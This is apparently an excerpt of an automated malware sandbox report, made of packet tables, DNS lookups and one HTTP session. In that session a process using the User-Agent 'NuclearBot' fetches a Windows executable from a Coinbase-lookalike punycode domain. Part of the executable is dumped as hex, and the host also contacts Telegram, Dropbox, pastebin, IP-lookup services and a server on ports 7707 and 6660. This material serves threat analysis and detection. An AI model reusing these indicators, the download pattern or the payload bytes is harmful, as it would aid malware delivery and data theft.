                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.133184910 CEST4995480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.257224083 CEST4995580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.262185097 CEST8049955188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.262247086 CEST4995580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.262339115 CEST4995580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.267124891 CEST8049955188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.267172098 CEST4995580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.272118092 CEST8049955188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.045747995 CEST8049955188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.046691895 CEST8049955188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.048011065 CEST4995580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.048135042 CEST4995580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.160298109 CEST4995680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.165975094 CEST8049956188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.166191101 CEST4995680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.166191101 CEST4995680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.172550917 CEST8049956188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.174037933 CEST4995680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.181704044 CEST8049956188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.021195889 CEST8049956188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.021224022 CEST8049956188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.021238089 CEST8049956188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.021277905 CEST4995680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.021302938 CEST4995680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.023519993 CEST4995680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.128161907 CEST4995780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.136272907 CEST8049957188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.136338949 CEST4995780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.136375904 CEST4995780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.142589092 CEST8049957188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.142632008 CEST4995780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.148878098 CEST8049957188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.831342936 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.836252928 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.836337090 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.841154099 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.867224932 CEST8049957188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.867877960 CEST8049957188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.868252039 CEST4995780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.869299889 CEST4995780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.971983910 CEST4995980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.976969957 CEST8049959188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.978282928 CEST4995980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.978282928 CEST4995980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.983146906 CEST8049959188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.983269930 CEST4995980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.988120079 CEST8049959188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.158431053 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.252631903 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.300925016 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.305551052 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.310898066 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.311136007 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.316010952 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.789191008 CEST8049959188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.789890051 CEST8049959188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.789940119 CEST4995980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:26.152858019 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:26.231744051 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:26.285439014 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:26.346379995 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:33.608812094 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:33.613766909 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:33.613827944 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:33.618573904 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:33.939729929 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:34.049515963 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:34.066585064 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:34.073740005 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:34.081746101 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:34.081801891 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:34.089721918 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:35.930610895 CEST4995980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:36.455840111 CEST499526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:36.456095934 CEST499606660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:36.460846901 CEST66604995294.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:36.460995913 CEST66604996094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:36.461055994 CEST499606660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:36.461344004 CEST499606660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:36.466437101 CEST66604996094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:38.210424900 CEST66604996094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:38.210481882 CEST499606660192.168.2.494.232.249.204
                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Jul 6, 2024 13:26:57.142324924 CEST6339653192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:26:57.163058996 CEST53633961.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.634896040 CEST5016253192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.649292946 CEST53501621.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.551848888 CEST5091753192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.578268051 CEST53509171.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.821017981 CEST5795753192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.846481085 CEST53579571.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.281514883 CEST6411453192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.315220118 CEST53641141.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.320470095 CEST5076653192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.329668045 CEST53507661.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.281280994 CEST6063753192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.281765938 CEST6290653192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.288794994 CEST53606371.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.289696932 CEST53629061.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:22.028736115 CEST6244353192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:22.036364079 CEST53624431.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:22.073061943 CEST4959453192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.106578112 CEST4959453192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.166594028 CEST53495941.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.167161942 CEST53495941.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.291553020 CEST6217253192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.298573017 CEST53621721.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.878897905 CEST6255353192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.885947943 CEST53625531.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.644623995 CEST5678353192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.652460098 CEST53567831.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.298329115 CEST5375053192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.309245110 CEST53537501.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.738723993 CEST5571053192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.808413029 CEST53557101.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.554106951 CEST5859953192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.564553976 CEST53585991.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.915515900 CEST6194253192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.922348976 CEST53619421.1.1.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.610955000 CEST5923953192.168.2.41.1.1.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.617752075 CEST53592391.1.1.1192.168.2.4
                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Jul 6, 2024 13:26:57.142324924 CEST192.168.2.41.1.1.10xedStandard query (0)auth.xn--conbase-sfb.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.634896040 CEST192.168.2.41.1.1.10xe9cbStandard query (0)auth.xn--conbase-sfb.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.551848888 CEST192.168.2.41.1.1.10x74dcStandard query (0)auth.xn--conbase-sfb.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.821017981 CEST192.168.2.41.1.1.10xcfb0Standard query (0)www.igenius.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.281514883 CEST192.168.2.41.1.1.10xa908Standard query (0)hrdc.pkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.320470095 CEST192.168.2.41.1.1.10x8c85Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.281280994 CEST192.168.2.41.1.1.10xf17Standard query (0)dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.281765938 CEST192.168.2.41.1.1.10xa9abStandard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:22.028736115 CEST192.168.2.41.1.1.10x13ebStandard query (0)ipbase.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:22.073061943 CEST192.168.2.41.1.1.10x3ca6Standard query (0)www.westnilebirdingandsafari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.106578112 CEST192.168.2.41.1.1.10x3ca6Standard query (0)www.westnilebirdingandsafari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.291553020 CEST192.168.2.41.1.1.10xc2b7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.878897905 CEST192.168.2.41.1.1.10x8cf6Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.644623995 CEST192.168.2.41.1.1.10x8f03Standard query (0)dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.298329115 CEST192.168.2.41.1.1.10xc72Standard query (0)205.12.2.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.738723993 CEST192.168.2.41.1.1.10xda02Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.554106951 CEST192.168.2.41.1.1.10xfa91Standard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.915515900 CEST192.168.2.41.1.1.10x6b4cStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.610955000 CEST192.168.2.41.1.1.10x48feStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Jul 6, 2024 13:26:57.163058996 CEST1.1.1.1192.168.2.40xedNo error (0)auth.xn--conbase-sfb.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:26:57.163058996 CEST1.1.1.1192.168.2.40xedNo error (0)auth.xn--conbase-sfb.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.649292946 CEST1.1.1.1192.168.2.40xe9cbNo error (0)auth.xn--conbase-sfb.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.649292946 CEST1.1.1.1192.168.2.40xe9cbNo error (0)auth.xn--conbase-sfb.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.578268051 CEST1.1.1.1192.168.2.40x74dcNo error (0)auth.xn--conbase-sfb.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.578268051 CEST1.1.1.1192.168.2.40x74dcNo error (0)auth.xn--conbase-sfb.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.846481085 CEST1.1.1.1192.168.2.40xcfb0No error (0)www.igenius.orgigenius.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.846481085 CEST1.1.1.1192.168.2.40xcfb0No error (0)igenius.org192.3.140.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.315220118 CEST1.1.1.1192.168.2.40xa908No error (0)hrdc.pk64.31.40.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:19.329668045 CEST1.1.1.1192.168.2.40x8c85No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.288794994 CEST1.1.1.1192.168.2.40xf17No error (0)dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.288794994 CEST1.1.1.1192.168.2.40xf17No error (0)edge-block-www-env.dropbox-dns.com162.125.66.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.289696932 CEST1.1.1.1192.168.2.40xa9abNo error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.289696932 CEST1.1.1.1192.168.2.40xa9abNo error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:22.036364079 CEST1.1.1.1192.168.2.40x13ebNo error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:22.036364079 CEST1.1.1.1192.168.2.40x13ebNo error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.166594028 CEST1.1.1.1192.168.2.40x3ca6No error (0)www.westnilebirdingandsafari.com75.119.203.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.167161942 CEST1.1.1.1192.168.2.40x3ca6No error (0)www.westnilebirdingandsafari.com75.119.203.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.298573017 CEST1.1.1.1192.168.2.40xc2b7No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.298573017 CEST1.1.1.1192.168.2.40xc2b7No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.298573017 CEST1.1.1.1192.168.2.40xc2b7No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.885947943 CEST1.1.1.1192.168.2.40x8cf6No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.652460098 CEST1.1.1.1192.168.2.40x8f03No error (0)dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.652460098 CEST1.1.1.1192.168.2.40x8f03No error (0)edge-block-www-env.dropbox-dns.com162.125.66.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.309245110 CEST1.1.1.1192.168.2.40xc72Name error (3)205.12.2.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.808413029 CEST1.1.1.1192.168.2.40xda02No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.808413029 CEST1.1.1.1192.168.2.40xda02No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.564553976 CEST1.1.1.1192.168.2.40xfa91No error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.564553976 CEST1.1.1.1192.168.2.40xfa91No error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.922348976 CEST1.1.1.1192.168.2.40x6b4cNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.922348976 CEST1.1.1.1192.168.2.40x6b4cNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.922348976 CEST1.1.1.1192.168.2.40x6b4cNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.617752075 CEST1.1.1.1192.168.2.40x48feNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                • auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                • api.telegram.org
                                                                                                                                                                                                                                • freegeoip.app
                                                                                                                                                                                                                                • dl.dropboxusercontent.com
                                                                                                                                                                                                                                • ipbase.com
                                                                                                                                                                                                                                • api.ipify.org
                                                                                                                                                                                                                                • api.mylnikov.org
                                                                                                                                                                                                                                • pastebin.com
                                                                                                                                                                                                                                • www.igenius.org
                                                                                                                                                                                                                                • hrdc.pk
                                                                                                                                                                                                                                • www.westnilebirdingandsafari.com
                                                                                                                                                                                                                                • ip-api.com
                                                                                                                                                                                                                                • icanhazip.com
                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.449731188.114.97.3807152C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.661295891 CEST114OUTGET /api/update.pack HTTP/1.1
                                                                                                                                                                                                                                User-Agent: NuclearBot
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304615974 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:08 GMT
                                                                                                                                                                                                                                Content-Length: 270848
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jul 2024 05:33:50 GMT
                                                                                                                                                                                                                                ETag: "42200-61c28f1291b41"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dio18RgX4e%2BgBH3CnXvOdCtF%2FCUvrDnB8exXY23l2626dehfOl0jLUqs7ufIWfVbjs%2FeBCGOzlCs7KznmYyLADhEnae1k74oZpeph5LVKczU6Xj9SInbwG0o%2BoJGYqvu9Cql3jWhikhSvRs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3e6b8c4b8c1d-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd cb 1a 09 b9 aa 74 5a b9 aa 74 5a b9 aa 74 5a b9 aa 75 5a c1 aa 74 5a 45 dd cd 5a be aa 74 5a 7d 6f b9 5a b0 aa 74 5a 7d 6f bb 5a 84 aa 74 5a 7d 6f ba 5a 14 aa 74 5a 9e 6c ba 5a bc aa 74 5a 9e 6c bb 5a ad aa 74 5a 9e 6c be 5a b8 aa 74 5a 9e 6c bd 5a b8 aa 74 5a 9e 6c b8 5a b8 aa 74 5a 52 69 63 68 b9 aa 74 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 be 3f 82 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 d6 02 00 00 ec 01 00 00 00 00 00 70 d5 01 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$tZtZtZuZtZEZtZ}oZtZ}oZtZ}oZtZlZtZlZtZlZtZlZtZlZtZRichtZPEd?f" p`S$(0mp@.text< `.rdataC@
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304836035 CEST1236INData Raw: 00 40 2e 64 61 74 61 00 00 00 c8 cb 00 00 00 c0 03 00 00 28 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 30 00 00 00 90 04 00 00 32 00 00 00 ca 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
                                                                                                                                                                                                                                Data Ascii: @.data(@.pdata02@@.rsrc@@.relocd "@B
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304869890 CEST1236INData Raw: 8b 18 eb 0d 48 8b 4b 10 e8 1d 14 00 00 48 8b 5b 08 48 85 db 75 ee 48 8b 4f 38 e8 0b 14 00 00 48 8b 4f 30 e8 02 14 00 00 48 8b cf 48 8b 5c 24 30 48 83 c4 20 5f 48 ff 25 92 d3 03 00 cc cc 45 33 c0 e9 8c 0b 00 00 48 89 5c 24 18 48 89 4c 24 08 55 48
                                                                                                                                                                                                                                Data Ascii: HKH[HuHO8HO0HH\$0H _H%E3H\$HL$UHH EHu3HHtHMHUAuHEHUHHEuLCHUH?uLCHUHC{uHUH
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304887056 CEST1236INData Raw: 3b 5c 24 68 75 23 ff 15 6e d0 03 00 48 8d 54 24 68 44 8b c6 44 89 30 48 8b cb c7 07 02 00 00 00 ff 15 6c d0 03 00 89 47 08 ff 15 4b d0 03 00 44 39 30 75 07 48 3b 5c 24 68 75 07 44 89 37 48 89 5f 08 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 8b 74 24
                                                                                                                                                                                                                                Data Ascii: ;\$hu#nHT$hDD0HlGKD90uH;\$huD7H_3H\$`Hl$pHt$xH0A_A^A]A\_H\$Hl$Ht$WH AA@uu-u:3@.ut#@euuCGtu@0uu.u0@t"
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304903984 CEST1236INData Raw: 00 00 eb 1e b8 05 00 00 00 eb 17 49 8b 06 c6 04 06 00 45 8b c5 49 8b d7 48 8b cd e8 62 f7 ff ff 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 83 c4 30 41 5f 41 5e 41 5d 5f 5e c3 cc 48 89 5c 24 08 48 89 74 24 18 57 48 83 ec 20 48 8b 02 49 8b d8 48 8b fa
                                                                                                                                                                                                                                Data Ascii: IEIHb3H\$`Hl$pH0A_A^A]_^H\$Ht$WH HIH8"H8[8fty8ntK8tto8{tv-AHCHuLHHAHHYAu`AKAHH
